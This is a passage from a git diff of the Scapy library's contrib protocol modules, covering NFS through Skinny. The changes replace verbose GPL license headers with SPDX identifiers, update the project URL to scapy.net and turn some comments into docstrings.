Sensor Networks (MQTT-SN) # scapy.contrib.status = loads diff --git a/scapy/contrib/nfs.py b/scapy/contrib/nfs.py index c5feff508c3..5f6ca940f56 100644 --- a/scapy/contrib/nfs.py +++ b/scapy/contrib/nfs.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Lucas Preston -# This program is published under a GPLv2 license # scapy.contrib.description = Network File System (NFS) v3 # scapy.contrib.status = loads diff --git a/scapy/contrib/nlm.py b/scapy/contrib/nlm.py index 5f296839629..bd59bdba350 100644 --- a/scapy/contrib/nlm.py +++ b/scapy/contrib/nlm.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Lucas Preston -# This program is published under a GPLv2 license # scapy.contrib.description = Network Lock Manager (NLM) v4 # scapy.contrib.status = loads diff --git a/scapy/contrib/nsh.py b/scapy/contrib/nsh.py index 7f5fcf99933..029d0b88d5e 100644 --- a/scapy/contrib/nsh.py +++ b/scapy/contrib/nsh.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Network Services Headers (NSH) # scapy.contrib.status = loads diff --git a/scapy/contrib/oncrpc.py b/scapy/contrib/oncrpc.py index 29fbb50eb60..2eccad6fdae 100644 --- a/scapy/contrib/oncrpc.py +++ b/scapy/contrib/oncrpc.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Lucas Preston -# This program is published under a GPLv2 license # scapy.contrib.description = ONC-RPC v2 # scapy.contrib.status = loads diff --git a/scapy/contrib/opc_da.py b/scapy/contrib/opc_da.py index e045d4c0d08..ec6365580ff 100644 --- a/scapy/contrib/opc_da.py +++ b/scapy/contrib/opc_da.py @@ -1,22 +1,8 @@ -# coding: utf8 - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software FounDation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - -# Copyright (C) -# @Author: GuillaumeF -# @Email: guillaume4favre@gmail.com +# See https://scapy.net/ for more information +# Copyright (C) GuillaumeF + # @Date: 2016-10-18 # @Last modified by: GuillaumeF # @Last modified by: Sebastien Mainand diff --git a/scapy/contrib/openflow.py b/scapy/contrib/openflow.py index 047cc8395e8..13a924666b2 100755 --- a/scapy/contrib/openflow.py +++ b/scapy/contrib/openflow.py @@ -1,12 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license - # Copyright (C) 2014 Maxence Tury -# OpenFlow is an open standard used in SDN deployments. -# Based on OpenFlow v1.0.1 -# Specifications can be retrieved from https://www.opennetworking.org/ + +""" +OpenFlow v1.0.1 + +OpenFlow is an open standard used in SDN deployments. +Specifications can be retrieved from https://www.opennetworking.org/ +""" # scapy.contrib.description = Openflow v1.0 # scapy.contrib.status = loads diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index b81e26b09bb..1a85dc63056 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -1,12 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license - # Copyright (C) 2014 Maxence Tury -# OpenFlow is an open standard used in SDN deployments. -# Based on OpenFlow v1.3.4 -# Specifications can be retrieved from https://www.opennetworking.org/ + +""" +OpenFlow v1.3.4 + +OpenFlow is an open standard used in SDN deployments. +Specifications can be retrieved from https://www.opennetworking.org/ +""" + # scapy.contrib.description = OpenFlow v1.3 # scapy.contrib.status = loads diff --git a/scapy/contrib/ospf.py b/scapy/contrib/ospf.py index 12fe3b3af06..7dbd3ea1881 100644 --- a/scapy/contrib/ospf.py +++ b/scapy/contrib/ospf.py @@ -1,28 +1,17 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (c) 2008 Dirk Loss +# Copyright (c) 2010 Jochen Bartl + # scapy.contrib.description = Open Shortest Path First (OSPF) # scapy.contrib.status = loads -# This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - """ OSPF extension for Scapy This module provides Scapy layers for the Open Shortest Path First routing protocol as defined in RFC 2328 and RFC 5340. - -Copyright (c) 2008 Dirk Loss : mail dirk-loss de -Copyright (c) 2010 Jochen Bartl : jochen.bartl gmail com """ diff --git a/scapy/contrib/pfcp.py b/scapy/contrib/pfcp.py index 741139e0e2a..fc2e3d41322 100644 --- a/scapy/contrib/pfcp.py +++ b/scapy/contrib/pfcp.py @@ -1,22 +1,11 @@ -#! /usr/bin/env python - -# Copyright (C) 2019 Travelping GmbH - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2019 Travelping GmbH -# 3GPP TS 29.244 +""" +3GPP TS 29.244 +""" # scapy.contrib.description = 3GPP Packet Forwarding Control Protocol # scapy.contrib.status = loads diff --git a/scapy/contrib/pim.py b/scapy/contrib/pim.py index 42f3d549369..ec716f4cb36 100644 --- a/scapy/contrib/pim.py +++ b/scapy/contrib/pim.py @@ -1,17 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . -# +# See https://scapy.net/ for more information + # scapy.contrib.description = Protocol Independent Multicast (PIM) # scapy.contrib.status = loads """ diff --git a/scapy/contrib/pnio.py b/scapy/contrib/pnio.py index 9f7764a8bc5..fd013385694 100644 --- a/scapy/contrib/pnio.py +++ b/scapy/contrib/pnio.py @@ -1,18 +1,6 @@ -# coding: utf8 +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) 2016 Gauthier Sebaux # scapy.contrib.description = ProfinetIO RTC (+Profisafe) layer diff --git a/scapy/contrib/pnio_dcp.py b/scapy/contrib/pnio_dcp.py index f62e05d4397..d3a22c8707e 100644 --- a/scapy/contrib/pnio_dcp.py +++ b/scapy/contrib/pnio_dcp.py @@ -1,19 +1,6 @@ -# coding: utf8 - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) 2019 Stefan Mehner (stefan.mehner@b-tu.de) # scapy.contrib.description = Profinet DCP layer diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index 5d11312ec3e..16862298ac4 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -1,17 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) 2016 Gauthier Sebaux # scapy.contrib.description = ProfinetIO Remote Procedure Call (RPC) diff --git a/scapy/contrib/portmap.py b/scapy/contrib/portmap.py index 3ed70220dba..ed30b0994a2 100644 --- a/scapy/contrib/portmap.py +++ b/scapy/contrib/portmap.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Lucas Preston -# This program is published under a GPLv2 license # scapy.contrib.description = Portmapper v2 # scapy.contrib.status = loads diff --git a/scapy/contrib/ppi_cace.py b/scapy/contrib/ppi_cace.py index d472f7bd948..e8190adb0c4 100644 --- a/scapy/contrib/ppi_cace.py +++ b/scapy/contrib/ppi_cace.py @@ -1,17 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # author: # scapy.contrib.description = CACE Per-Packet Information (PPI) diff --git a/scapy/contrib/ppi_geotag.py b/scapy/contrib/ppi_geotag.py index fcc763fb759..829718fbb90 100644 --- a/scapy/contrib/ppi_geotag.py +++ b/scapy/contrib/ppi_geotag.py @@ -1,17 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # author: # scapy.contrib.description = CACE Per-Packet Information (PPI) Geolocation diff --git a/scapy/contrib/ripng.py b/scapy/contrib/ripng.py index e5f71500777..34ce9d74703 100644 --- a/scapy/contrib/ripng.py +++ b/scapy/contrib/ripng.py @@ -1,16 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information # scapy.contrib.description = Routing Information Protocol next gen (RIPng) # scapy.contrib.status = loads diff --git a/scapy/contrib/roce.py b/scapy/contrib/roce.py index cc9a2a37ae1..c927d1e67f1 100644 --- a/scapy/contrib/roce.py +++ b/scapy/contrib/roce.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Haggai Eran -# This program is published under a GPLv2 license # scapy.contrib.description = RoCE v2 # scapy.contrib.status = loads diff --git a/scapy/contrib/rpl.py b/scapy/contrib/rpl.py index 562f49ce9f2..d282c56e05c 100644 --- a/scapy/contrib/rpl.py +++ b/scapy/contrib/rpl.py @@ -1,22 +1,8 @@ -# This file is part of Scapy. -# See http://www.secdev.org/projects/scapy for more information. -# -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# (at your option) any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . -# +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2020 Rahul Jadhav -# RFC 6550 # scapy.contrib.description = Routing Protocol for LLNs (RPL) # scapy.contrib.status = loads diff --git a/scapy/contrib/rpl_metrics.py b/scapy/contrib/rpl_metrics.py index 01a95bc01f8..f8e7531f81f 100644 --- a/scapy/contrib/rpl_metrics.py +++ b/scapy/contrib/rpl_metrics.py @@ -1,22 +1,8 @@ -# This file is part of Scapy. -# See http://www.secdev.org/projects/scapy for more information. -# -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# (at your option) any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . -# +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2020 Rahul Jadhav -# RFC 6551 # scapy.contrib.description = Routing Metrics used for Path Calc in LLNs # scapy.contrib.status = loads diff --git a/scapy/contrib/rsvp.py b/scapy/contrib/rsvp.py index c6cfd9d5390..e68ad9631f5 100644 --- a/scapy/contrib/rsvp.py +++ b/scapy/contrib/rsvp.py @@ -1,18 +1,10 @@ -# RSVP layer - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information + +""" +RSVP layer +""" # scapy.contrib.description = Resource Reservation Protocol (RSVP) # scapy.contrib.status = loads diff --git a/scapy/contrib/rtcp.py b/scapy/contrib/rtcp.py index 431427bd312..25414182e11 100644 --- a/scapy/contrib/rtcp.py +++ b/scapy/contrib/rtcp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Pavel Oborin -# This program is published under a GPLv2 license # RFC 3550 # scapy.contrib.description = Real-Time Transport Control Protocol diff --git a/scapy/contrib/rtps/__init__.py b/scapy/contrib/rtps/__init__.py index da35986d343..6b82983e592 100644 --- a/scapy/contrib/rtps/__init__.py +++ b/scapy/contrib/rtps/__init__.py @@ -1,20 +1,10 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2021 Trend Micro Incorporated + """ Real-Time Publish-Subscribe Protocol (RTPS) dissection - -Copyright (C) 2021 Trend Micro Incorporated - -This program is free software; you can redistribute it and/or modify it under -the terms of the GNU General Public License as published by the Free Software -Foundation; either version 2 of the License, or (at your option) any later -version. - -This program is distributed in the hope that it will be useful, but WITHOUT ANY -WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A -PARTICULAR PURPOSE. See the GNU General Public License for more details. - -You should have received a copy of the GNU General Public License along with -this program; if not, write to the Free Software Foundation, Inc., 51 Franklin -Street, Fifth Floor, Boston, MA 02110-1301, USA. """ # scapy.contrib.description = Real-Time Publish-Subscribe Protocol (RTPS) diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py index 2b47c05ab11..c1a9424f741 100644 --- a/scapy/contrib/rtps/common_types.py +++ b/scapy/contrib/rtps/common_types.py @@ -1,21 +1,11 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2021 Trend Micro Incorporated +# Copyright (C) 2021 Alias Robotics S.L. + """ Real-Time Publish-Subscribe Protocol (RTPS) dissection - -Copyright (C) 2021 Trend Micro Incorporated -Copyright (C) 2021 Alias Robotics S.L. - -This program is free software; you can redistribute it and/or modify it under -the terms of the GNU General Public License as published by the Free Software -Foundation; either version 2 of the License, or (at your option) any later -version. - -This program is distributed in the hope that it will be useful, but WITHOUT ANY -WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A -PARTICULAR PURPOSE. See the GNU General Public License for more details. - -You should have received a copy of the GNU General Public License along with -this program; if not, write to the Free Software Foundation, Inc., 51 Franklin -Street, Fifth Floor, Boston, MA 02110-1301, USA. """ # scapy.contrib.description = RTPS common types diff --git a/scapy/contrib/rtps/pid_types.py b/scapy/contrib/rtps/pid_types.py index 90bba7d3ca4..a2f305b7d16 100644 --- a/scapy/contrib/rtps/pid_types.py +++ b/scapy/contrib/rtps/pid_types.py @@ -1,21 +1,11 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2021 Trend Micro Incorporated +# Copyright (C) 2021 Alias Robotics S.L. + """ Real-Time Publish-Subscribe Protocol (RTPS) dissection - -Copyright (C) 2021 Trend Micro Incorporated -Copyright (C) 2021 Alias Robotics S.L. - -This program is free software; you can redistribute it and/or modify it under -the terms of the GNU General Public License as published by the Free Software -Foundation; either version 2 of the License, or (at your option) any later -version. - -This program is distributed in the hope that it will be useful, but WITHOUT ANY -WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A -PARTICULAR PURPOSE. See the GNU General Public License for more details. - -You should have received a copy of the GNU General Public License along with -this program; if not, write to the Free Software Foundation, Inc., 51 Franklin -Street, Fifth Floor, Boston, MA 02110-1301, USA. """ # scapy.contrib.description = RTPS PID type definitions diff --git a/scapy/contrib/rtps/rtps.py b/scapy/contrib/rtps/rtps.py index 9c1661096c5..82c9ffb8d1e 100644 --- a/scapy/contrib/rtps/rtps.py +++ b/scapy/contrib/rtps/rtps.py @@ -1,21 +1,11 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2021 Trend Micro Incorporated +# Copyright (C) 2021 Alias Robotics S.L. + """ Real-Time Publish-Subscribe Protocol (RTPS) dissection - -Copyright (C) 2021 Trend Micro Incorporated -Copyright (C) 2021 Alias Robotics S.L. - -This program is free software; you can redistribute it and/or modify it under -the terms of the GNU General Public License as published by the Free Software -Foundation; either version 2 of the License, or (at your option) any later -version. - -This program is distributed in the hope that it will be useful, but WITHOUT ANY -WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A -PARTICULAR PURPOSE. See the GNU General Public License for more details. - -You should have received a copy of the GNU General Public License along with -this program; if not, write to the Free Software Foundation, Inc., 51 Franklin -Street, Fifth Floor, Boston, MA 02110-1301, USA. """ # scapy.contrib.description = RTPS abstractions diff --git a/scapy/contrib/rtr.py b/scapy/contrib/rtr.py index 425e4926f88..ab48366b41a 100755 --- a/scapy/contrib/rtr.py +++ b/scapy/contrib/rtr.py @@ -1,21 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) 2018 Francois Contat -# Based on RTR RFC 6810 https://tools.ietf.org/html/rfc6810 for version 0 -# Based on RTR RFC 8210 https://tools.ietf.org/html/rfc8210 for version 1 +""" +RTR + +Based on RTR RFC 6810 https://tools.ietf.org/html/rfc6810 for version 0 +Based on RTR RFC 8210 https://tools.ietf.org/html/rfc8210 for version 1 +""" # scapy.contrib.description = The RPKI to Router Protocol # scapy.contrib.status = loads diff --git a/scapy/contrib/scada/__init__.py b/scapy/contrib/scada/__init__.py index ded0ace44f2..f67d3dfdd7c 100644 --- a/scapy/contrib/scada/__init__.py +++ b/scapy/contrib/scada/__init__.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Thomas Tannhaeuser -# This program is published under a GPLv2 license -# + # scapy.contrib.status = skip diff --git a/scapy/contrib/scada/iec104/__init__.py b/scapy/contrib/scada/iec104/__init__.py index 896a9f43a1d..5184b16fdb3 100644 --- a/scapy/contrib/scada/iec104/__init__.py +++ b/scapy/contrib/scada/iec104/__init__.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Thomas Tannhaeuser -# This program is published under a GPLv2 license -# + # scapy.contrib.description = IEC-60870-5-104 APCI / APDU layer definitions # scapy.contrib.status = loads diff --git a/scapy/contrib/scada/iec104/iec104_fields.py b/scapy/contrib/scada/iec104/iec104_fields.py index e1f48db6bfc..59208b93a75 100644 --- a/scapy/contrib/scada/iec104/iec104_fields.py +++ b/scapy/contrib/scada/iec104/iec104_fields.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Thomas Tannhaeuser -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/scada/iec104/iec104_information_elements.py b/scapy/contrib/scada/iec104/iec104_information_elements.py index dcaddb487d2..13444213d9c 100644 --- a/scapy/contrib/scada/iec104/iec104_information_elements.py +++ b/scapy/contrib/scada/iec104/iec104_information_elements.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Thomas Tannhaeuser -# This program is published under a GPLv2 license # scapy.contrib.status = skip diff --git a/scapy/contrib/scada/iec104/iec104_information_objects.py b/scapy/contrib/scada/iec104/iec104_information_objects.py index 23546121e35..700029ab29c 100644 --- a/scapy/contrib/scada/iec104/iec104_information_objects.py +++ b/scapy/contrib/scada/iec104/iec104_information_objects.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Thomas Tannhaeuser -# This program is published under a GPLv2 license -# + # scapy.contrib.description = IEC-60870-5-104 ASDU layers / IO definitions # scapy.contrib.status = loads diff --git a/scapy/contrib/scada/pcom.py b/scapy/contrib/scada/pcom.py index e5e17cfbf92..533109cdb47 100755 --- a/scapy/contrib/scada/pcom.py +++ b/scapy/contrib/scada/pcom.py @@ -1,28 +1,19 @@ -# coding: utf8 - +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright (C) 2019 Luis Rosa # scapy.contrib.description = PCOM Protocol # scapy.contrib.status = loads -# Copyright (C) 2019 Luis Rosa -# -# PCOM is a protocol to communicate with Unitronics PLCs either by serial -# or TCP. Two modes are available, ASCII and Binary. -# -# See https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf # noqa +""" +PCOM + +PCOM is a protocol to communicate with Unitronics PLCs either by serial +or TCP. Two modes are available, ASCII and Binary. + +https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf +""" import struct diff --git a/scapy/contrib/sdnv.py b/scapy/contrib/sdnv.py index 98eb8acb5b2..5e497ce3b22 100644 --- a/scapy/contrib/sdnv.py +++ b/scapy/contrib/sdnv.py @@ -1,26 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . +# See https://scapy.net/ for more information +# Copyright 2012 (C) The MITRE Corporation """ - Copyright 2012, The MITRE Corporation:: - - NOTICE +.. centered:: + NOTICE This software/technical data was produced for the U.S. Government under Prime Contract No. NASA-03001 and JPL Contract No. 1295026 - and is subject to FAR 52.227-14 (6/87) Rights in Data General, - and Article GP-51, Rights in Data General, respectively. - This software is publicly released under MITRE case #12-3054 + and is subject to FAR 52.227-14 (6/87) Rights in Data General, + and Article GP-51, Rights in Data General, respectively. + This software is publicly released under MITRE case #12-3054 """ # scapy.contrib.description = Self-Delimiting Numeric Values (SDNV) diff --git a/scapy/contrib/sebek.py b/scapy/contrib/sebek.py index 65543c3c391..fa467174a1a 100644 --- a/scapy/contrib/sebek.py +++ b/scapy/contrib/sebek.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Sebek: kernel module for data collection on honeypots. diff --git a/scapy/contrib/send.py b/scapy/contrib/send.py index 6a6474890c4..82e8ef4688a 100644 --- a/scapy/contrib/send.py +++ b/scapy/contrib/send.py @@ -1,21 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Copyright (C) 2009 Adline Stephane -# Copyright 2018 Gabriel Potter +# Copyright 2018 Gabriel Potter + +""" +Secure Neighbor Discovery (SEND) - RFC3971 +""" -# Partial support of RFC3971 # scapy.contrib.description = Secure Neighbor Discovery (SEND) (ICMPv6) # scapy.contrib.status = loads diff --git a/scapy/contrib/skinny.py b/scapy/contrib/skinny.py index 26c22e3b4b6..5bdf1a65c21 100644 --- a/scapy/contrib/skinny.py +++ b/scapy/contrib/skinny.py @@ -1,25 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2006 Nicolas Bareil eads.net> +# EADS/CRC security team + # scapy.contrib.description = Skinny Call 